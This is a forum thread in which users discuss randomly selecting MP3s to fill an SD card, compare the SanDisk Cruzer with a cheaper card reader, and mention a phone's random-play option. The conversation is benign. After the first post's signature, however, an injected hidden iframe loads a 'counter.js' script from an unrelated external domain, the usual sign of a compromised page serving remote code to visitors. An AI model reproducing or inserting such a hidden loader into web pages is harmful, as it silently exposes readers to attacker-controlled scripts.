+ Reply to Thread

Thread: MP3 Randomizer

MP3 Randomizer

Ok folks. I've got a Cruzer so that I can load MP3s to my SD card quickly. Now what I'd like to do is find some way to randomize my MP3s so that I can load a different set of songs each time I copy over to my SD card.

I have several folders of MP3s. I used to perform this "randomization" using Real Jukebox. Using Jukebox, you could create "Auto Playlists" which could include songs from different folders up to a certain number of minutes for all of the songs combined. Whenever I want, I could randomize which songs would be chosen to fill up this list. I could then copy the songs in this list to my Sony memorystick with a driver provided by Real. Unfortunately, there is no way to transfer these songs to an SD card as there is no driver for it.

Any suggestions?

Thanks.

Andrew<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You do know that the 7135 Mp3 player has a "Random" option, right?
    ~'kito
    pdaPhoneHome Moderator

Re: MP3 Randomizer

Originally posted by dreamwave6
    Ok folks. I've got a Cruzer so that I can load MP3s to my SD card quickly.
    Why is everybody so stoked about the Cruzer? Why not the SanDisk USB 2.0 6-in-1 memory card reader for 1/3 the price?

-Quick

cruzer vs ImageMate

Cruzer comes with an SD card included, and you can get it in various 'memory' sizes (32mb; 64mb; 126mb and 256mb)

The ImageMate 6-in-1 does not come with any memory cards, but certainly looks like a nice piece of hardware.

There's the difference.

Jeff

Originally posted by Quick
    Why is everybody so stoked about the Cruzer? Why not the SanDisk USB 2.0 6-in-1 memory card reader for 1/3 the price?

-Quick
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Some replies talked about the random function that the 7135 mp3 player already has, but the issue that I think dreamwave6 raised is that only a certain amount of mp3 files can fit onto a SD card.

I would like to put every studio CD that RUSH has onto one SD card, but they would never all fit. But grabbing random tracks from a directory with hundreds of mp3 files would be a cool way to have a variety of music available on one or two SD cards. I may write a program to randomly grab tracks for a 256 or 512 mb SD card to do what dreamwave6 is proposing.

Originally posted by James Keys
    Some replies talked about the random function that the 7135 mp3 player already has, but the issue that I think dreamwave6 raised is that only a certain amount of mp3 files can fit onto a SD card.

I would like to put every studio CD that RUSH has onto one SD card, but they would never all fit. But grabbing random tracks from a directory with hundreds of mp3 files would be a cool way to have a variety of music available on one or two SD cards. I may write a program to randomly grab tracks for a 256 or 512 mb SD card to do what dreamwave6 is proposing.
    Sounds great James. Please let me know if you write such a program.

Andrew